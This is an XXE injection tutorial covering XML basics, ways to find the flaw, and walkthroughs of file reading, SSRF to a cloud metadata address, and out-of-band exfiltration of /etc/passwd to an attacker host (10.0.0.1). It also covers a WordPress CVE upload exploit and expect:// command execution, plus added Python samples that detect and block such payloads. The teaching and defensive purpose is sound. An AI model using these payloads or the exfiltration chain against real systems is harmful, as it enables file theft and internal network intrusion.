XXE (XML External Entity) Vuln

XML External Entity (XXE) injection is a vulnerability that allows attackers to exploit how some XML parsers process external entities. This can enable actions like reading files, carrying out server-side request forgery, remote code execution, denial of service attacks, and cross-site scripting. The document discusses how XXE works, how to find XXE vulnerabilities, and examples of exploiting XXE to read files, perform SSRF, carry out data exfiltration via out-of-band techniques, and achieve remote code execution. It also provides background on XML concepts like elements, DTDs, and entities that are involved in XXE attacks.

XXE (XML External Entity) Vulnerability

By Assim
Twitter @0UN390

Table of Contents
What is XXE?
Introduction
Impact
XML Basics
XXE Vulnerabilities
Finding XXE Vulnerabilities
Exploiting XXE
Reading files
SSRF
Data Exfiltration via Out-Of-Band
RCE
Labs
References

What is XXE?
An XXE injection attack, also known as an XML External Entity attack, is a type
of attack that exploits vulnerable XML parsers in web applications.
XXE injection has been on the OWASP Top 10 list because many websites use XML
to transport data.

Introduction
XML External Entity (XXE) is a critical security vulnerability that affects applications
processing XML input. XXE occurs when an application parses XML input that includes
external entities, which can lead to information disclosure, server-side request forgery
(SSRF), out-of-band (OOB) attacks, cross-site scripting (XSS), and sometimes even remote
code execution (RCE). In this article, we will delve into XXE vulnerabilities and
explore various examples to understand their impact.

Impact
● Read Files
● Server-Side Request Forgery (SSRF)
● Remote Code Execution (RCE)
● DoS Attack
● Cross-Site Scripting (XSS)

XML Basics
XML (eXtensible Markup Language) is a widely used markup language designed to store
and transport structured data. It provides a flexible and standardized way to describe, store,
and exchange information across different platforms and systems. In this article, we will
explore the fundamental concepts of XML, including the XML declaration, XML elements,
XML DTD (Document Type Definition), internal and external DTDs, and XML entities.

XML Declaration:
The XML declaration is the first line of an XML document and serves to identify the
document as XML. It typically appears as `<?xml version="1.0" encoding="UTF-8"?>`.

The declaration starts with `<?xml` and is followed by various attributes. The `version`
attribute specifies the XML version being used (e.g., "1.0"). The `encoding` attribute defines
the character encoding scheme used in the document (e.g., "UTF-8" for Unicode). An additional
attribute, `standalone`, can be used to indicate whether the XML document relies on
external resources.

XML Elements:
XML documents are composed of elements, which are the building blocks of the document's
structure. An element consists of a start tag, content, and an end tag. The start tag begins
with a less-than symbol `<`, followed by the element name, and ends with a greater-than
symbol `>`. The end tag has a similar structure but with a forward slash `/` before the
element name. The content lies between the start and end tags.

Consider, for example, a `<book>` element containing a `<title>` and an `<author>` element.
Here `<book>` is the parent element, containing two child elements `<title>` and
`<author>`. The content of the `<title>` element is "XML Basics," while the content of the
`<author>` element is "Khaled."

XML DTD (Document Type Definition):

A Document Type Definition (DTD) is used to define the structure and constraints of an XML
document. It specifies the elements, attributes, and their relationships within the document.
DTDs can be either internal or external.

Internal DTD:
An internal DTD is declared within the XML document itself, typically placed inside the
`<!DOCTYPE>` declaration, before the root element. It defines the elements, attributes, entities,
and their relationships.

As an example of an internal DTD, consider one that defines the root element as `<bookstore>`, which can
contain one or more `<book>` elements. Each `<book>` element should have a `<title>` and
an `<author>` element, both of which can contain character data (`#PCDATA`).
External DTD:
An external DTD is defined in a separate file and referenced within the XML document using
the `SYSTEM` or `PUBLIC` keyword.

For example, the element and entity definitions can be placed in a separate file, `books.dtd`,
and the XML document's `DOCTYPE` declaration then references the external DTD file "books.dtd,"
which contains the element and entity definitions, instead of carrying them inline.

XML Entities:
XML entities are used to represent special characters or reusable content within XML
documents. There are two types of entities: character entities and parameter entities.

Character entities represent special characters using predefined entities or user-defined
entities. For example, the `&lt;` entity represents the less-than symbol `<`, and `&amp;`
represents the ampersand `&`.

Parameter entities, on the other hand, are used to define reusable content in DTDs. They
are written with a `%` prefix (`%name;`) instead of `&`.

As an example of user-defined entities, consider a document whose DTD declares an entity
`&name;` for the string "Khaled," which is used within the `<to>` element, and an entity
`&greeting;` for the string "Hello, Khaled!", which is used within the `<message>` element.
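The building blocks described above (declaration, nested elements, an internal DTD and general entities), put together in two small documents and parsed with Python's standard library. This is an added example, not code from the original document: the `<book>` and `<to>`/`<message>` documents follow the page's descriptions, while the `<note>` and `<raw>` elements and the helper names `parse_outline`, `element_texts` and `expands_cleanly` are constructed for the example.

```python
# Added example (not part of the original document): the XML building blocks
# described above -- the declaration, nested elements, an internal DTD and
# general entities -- in two small documents, parsed with Python's standard
# library to show how the parser sees elements and expands entity references.
import xml.etree.ElementTree as ET

# Constructed sample: the page's <book> example, with an XML declaration.
BOOK_XML = """<?xml version="1.0" encoding="UTF-8"?>
<book>
  <title>XML Basics</title>
  <author>Khaled</author>
</book>
"""

# Constructed sample: the page's <to>/<message> entity example, declared in an
# internal DTD, plus a <raw> element using the predefined &lt; and &amp; entities.
NOTE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
  <!ELEMENT note (to, message, raw)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT message (#PCDATA)>
  <!ELEMENT raw (#PCDATA)>
  <!ENTITY name "Khaled">
  <!ENTITY greeting "Hello, Khaled!">
]>
<note>
  <to>&name;</to>
  <message>&greeting;</message>
  <raw>a &lt; b &amp; c</raw>
</note>
"""


def outline(element):
    """Return (tag, text) for a leaf or (tag, [children]) for a parent, so the
    parent/child structure of the elements is visible as plain Python data."""
    children = list(element)
    if children:
        return (element.tag, [outline(child) for child in children])
    return (element.tag, element.text)


def parse_outline(xml_text):
    return outline(ET.fromstring(xml_text))


def element_texts(xml_text):
    """Return {tag: text} for the root's children. The expat parser behind
    ElementTree expands &name;, &greeting;, &lt; and &amp; before handing the
    text over, so the application only ever sees the replacement strings."""
    root = ET.fromstring(xml_text)
    return {child.tag: child.text for child in root}


def expands_cleanly(xml_text):
    """True if every entity reference in the document is declared; the parser
    rejects a reference to an entity that no DTD declared."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    print(parse_outline(BOOK_XML))
    # ('book', [('title', 'XML Basics'), ('author', 'Khaled')])
    print(element_texts(NOTE_XML))
    # {'to': 'Khaled', 'message': 'Hello, Khaled!', 'raw': 'a < b & c'}
    print(expands_cleanly("<note><to>&name;</to></note>"))   # False: no DTD declares &name;
```

The point to take from `element_texts` is that entity replacement happens inside the parser, before application code runs; this is the same mechanism that, with an external entity instead of a fixed string, turns into the XXE attacks described in the rest of the document.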

XXE Vulnerabilities
XXE vulnerabilities arise due to the ability of XML processors to process external entities
and include them in the parsed output. External entities are defined in the Document Type
Definition (DTD) or inline within the XML document.

Finding XXE Vulnerabilities

● Use a proxy like Burp, intercept requests and responses, and search for XML-like
documents, e.g. for the string "<?xml".
● Decode suspicious blocks of data to identify encoded XML.
● Look for file-upload features, as XML forms the basis of many common file types.
● Explore endpoints where the application accepts XML data by default. Modify the
Content-Type header to "text/xml" or "application/xml" and include XML data in the
request body.
● Try to parse XML in different ways.
● Try basic XXE to retrieve files.
● Try XXE to SSRF.
● Try blind XXE.

Exploiting XXE

Reading files

Here we started by noticing the xml parameter in the request, which takes XML and might be
vulnerable to XXE. So, I will try to parse XML to test it, first directly and then the same
way with Burp Suite.

Now that I found it vulnerable to XXE, let's try to exploit it by retrieving /etc/passwd with a
payload that declares an external entity.

Looking at the payload, we see the "&xxe;" entity reference used in the <com> element. This entity
reference is defined in the <!ENTITY> declaration as reading the contents of the
"/etc/passwd" file. It means that the XML code is trying to read the contents of the
"/etc/passwd" file and include it in the <com> element.
So, I sent this using Burp Suite and it retrieved the /etc/passwd file.

Instead of reading the file directly like this, you can also try retrieving it base64-encoded.

SSRF
You can also exploit XXE to perform SSRF. For example, here there is an XML document in the
request, which might be vulnerable to XXE. As we can see, it is a simple XML document that
represents a stock check request. It contains information about a product and a store: the
<productId> element has a value of "2" and the <storeId> element has a value of "1". This
XML document is used to send a request to check the stock availability of a specific product at a
store.
Next, we can exploit it for SSRF. The resulting XML is similar to the previous example but
with an additional part, the "DOCTYPE" declaration. The important part is the "&xxe;" entity
reference used in the <productId> element. In this case, the entity reference is defined to
fetch data from a specific IP address (169.254.169.254) using the "http" protocol, which
attempts to access sensitive information or interact with a specific server.

By exploiting SSRF we can access files on servers, scan internal devices on the network,
or scan ports.

Data Exfiltration via Out-Of-Band

Following this article, we can try to do data exfiltration via out-of-band:
exploit-notes.hdks.org/exploit/web/security-risk/blind-xxe/
Looking at the first part, which is creating a DTD:

The first line is "<!ENTITY % file SYSTEM "file:///etc/passwd">". It defines an entity
named "file" that points to the "/etc/passwd" file on the system.
The second line is commented out with "<!--" and "-->". It suggests an alternative way to
define the "file" entity using PHP filters to base64-encode the contents of the "index.php" file.
PHP filters allow manipulating data streams in PHP.

The third line defines an entity named "eval" that contains an XML entity declaration. It
declares another entity named "exfiltrate" that points to a specific URL
("http://10.0.0.1/?x=%file;") with the value of the "file" entity appended as a parameter.

The fourth line, "%eval;", references the "eval" entity, which triggers the evaluation of the
entity declaration it contains.

The fifth line, "%exfiltrate;", references the "exfiltrate" entity, which triggers the request to
the URL specified in the "eval" entity.

Then we got the request on our listener, which is a simple Python server that you can run to
receive the connection; you can also do that with Burp Collaborator.

Moving to the next part, which is inserting the XXE:

This code defines a "DOCTYPE" section in XML. Inside this section, there is an entity
called "xxe" that is assigned the value of an external resource located at
"http://10.0.0.1/exploit.dtd". The "%xxe;" part references and uses this entity. Essentially, it
allows the XML document to include and utilize content from the specified external resource.
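Added defender-side example, not code from the original document or the article it cites: the three payload shapes described in the Reading files, SSRF and Out-Of-Band sections, run through a DTD inspector that reports what the document asks the parser to fetch, and a hardened parser that refuses any DOCTYPE outright (the standard mitigation from the OWASP cheat sheet in the references). The sample documents, the names `inspect_dtd`, `xxe_indicators`, `parse_without_dtd` and `accepts`, and the `<stockCheck>`/`<data>`/`<com>` element names are constructed for the example; the hosts and paths are the ones the page mentions.

```python
# Added example (not part of the original document): defensive handling of the
# payload shapes discussed in the Reading files, SSRF and Out-Of-Band sections.
# inspect_dtd() records what a document's DTD asks the parser to do (external
# general entities, parameter entities, external DTD subset) so a gateway or
# WAF rule can log and block it; parse_without_dtd() is a hardened parser that
# refuses any document carrying a DOCTYPE at all. Samples are constructed here;
# hosts and paths are the ones the page mentions.
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when a document contains a DOCTYPE and DTDs are not allowed."""


# Constructed samples: a benign stock-check request, then the file-read, SSRF
# and out-of-band (parameter entity) shapes the text describes.
BENIGN = ('<?xml version="1.0"?>'
          '<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>')
FILE_READ = ('<?xml version="1.0"?>'
             '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
             '<data><com>&xxe;</com></data>')
SSRF = ('<?xml version="1.0"?>'
        '<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>'
        '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
OOB = ('<?xml version="1.0"?>'
       '<!DOCTYPE data [ <!ENTITY % xxe SYSTEM "http://10.0.0.1/exploit.dtd"> %xxe; ]>'
       '<data>1</data>')


def inspect_dtd(xml_text):
    """Parse with expat without fetching anything and record DTD features.
    Returns {"has_doctype", "external_subset", "entities": [...]}; each entity
    entry notes whether it is external (system_id set) and whether it is a
    parameter entity (the '%' form used for out-of-band chains)."""
    report = {"has_doctype": False, "external_subset": None, "entities": []}
    parser = expat.ParserCreate()
    # Never resolve parameter entities; with no ExternalEntityRefHandler set,
    # expat also leaves external general entities unfetched, so this is safe
    # to run on hostile input.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["has_doctype"] = True
        report["external_subset"] = system_id

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        report["entities"].append({
            "name": name,
            "parameter": bool(is_parameter),
            "external": system_id is not None,
            "system_id": system_id,
        })

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return report


def xxe_indicators(xml_text):
    """Turn the report into log-friendly findings; an empty list means no DTD."""
    report = inspect_dtd(xml_text)
    findings = []
    if report["external_subset"]:
        findings.append(f"external DTD subset: {report['external_subset']}")
    for ent in report["entities"]:
        kind = "parameter" if ent["parameter"] else "general"
        if ent["external"]:
            findings.append(f"external {kind} entity {ent['name']} -> {ent['system_id']}")
    if report["has_doctype"] and not findings:
        findings.append("DOCTYPE present (internal entities only)")
    return findings


def parse_without_dtd(xml_text):
    """Hardened parse: a probe pass aborts at the first DOCTYPE, before any
    entity declaration is processed; only DTD-free documents reach ElementTree."""
    probe = expat.ParserCreate()

    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE for <{name}> is not allowed")

    probe.StartDoctypeDeclHandler = reject
    probe.Parse(xml_text, True)
    return ET.fromstring(xml_text)


def accepts(xml_text):
    """True if the hardened parser accepts the document, False if it rejects it."""
    try:
        parse_without_dtd(xml_text)
        return True
    except DoctypeRejected:
        return False


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file read", FILE_READ),
                       ("ssrf", SSRF), ("oob", OOB)]:
        print(label, xxe_indicators(doc), "accepted" if accepts(doc) else "rejected")
```

The inspector relies on expat's defaults of never resolving parameter entities and never fetching external general entities when no `ExternalEntityRefHandler` is set, which is why it can be pointed at untrusted input. Rejecting at the `StartDoctypeDeclHandler` is the same mechanism defusedxml's `forbid_dtd` option uses; it stops every variant on the page (file read, SSRF and the out-of-band parameter-entity chain) at once, because all of them need a DOCTYPE to declare their entity.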

WordPress CVE
Here I apply the previous concept to WordPress (CVE-2021-29447), with a few
differences.
Starting with the dashboard, you can notice that there is an upload functionality.

So, let's write our DTD as explained earlier.

Now let's create a payload.wav to upload later, with content that is the same as the insert
phase previously; since here we have an upload functionality, it is a little different.

Now we run our Python server in the same path and upload our exploit.

As you can see, we received the /etc/passwd file, but in base64,
so now let's decode it to get the content.
RCE
Sometimes we can use expect://id if the "expect" wrapper is available, which is a feature specific
to certain XML parsers that allows executing arbitrary commands or retrieving sensitive
information from the server.

Labs
● portswigger.net/web-security/xxe
● https://www.vulnhub.com/entry/xxe-lab-1,254/
● https://tryhackme.com/room/mustacchio
● https://tryhackme.com/room/wordpresscve202129447
References
1. World Wide Web Consortium (W3C) Recommendation - Extensible Markup Language (XML): w3.org/TR/xml
2. W3Schools - XML Tutorial: w3schools.com/xml
3. Mozilla Developer Network (MDN) - XML Introduction: https://developer.mozilla.org/en-US/docs/Web/XML/XML_introduction
4. OWASP - XML External Entity (XXE) Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
5. GitHub - XXE/README.md: github.com/AfvanMoopen/tryhackme-/blob/master/XXE/README.md
6. HackerOne Report: hackerone.com/reports/347139
7. InfoSec Write-ups - Thick Client Pentest, Out-of-band XXE, Bug Hunting Resources: infosecwriteups.com/thick-client-pentest-out-of-band-xxe-bug-hunting-resources-rdp-logontypes-powershell-2363bc3c7752
8. OWASP - XML External Entity (XXE) Processing: owasp.org/XML_External_Entity_(XXE)_Processing
9. OWASP - XML Security Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html
10. XML External Entity (XXE) Injection in Web App Penetration Testing: cyberw1ng.medium.com/xml-external-entity-xxe-injection-in-web-app-penetration-testing-2023-3eaa79b32c82
11. CVE-2022-42710: A Journey Through XXE to Stored XSS: infosecwriteups.com/cve-2022-42710-a-journey-through-xxe-to-stored-xss-851d74dfe917
12. Exploiting Out-of-Band XXE in the Wild: 0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2
13. Exploit Notes - Blind XXE: exploit-notes.hdks.org/exploit/web/security-risk/blind-xxe/
14. XML External Entity (XXE) - Web Attacks: www.pwny.cc/web-attacks/xml-external-entity-xxe
15. PortSwigger - XML External Entity (XXE): portswigger.net/web-security/xxe
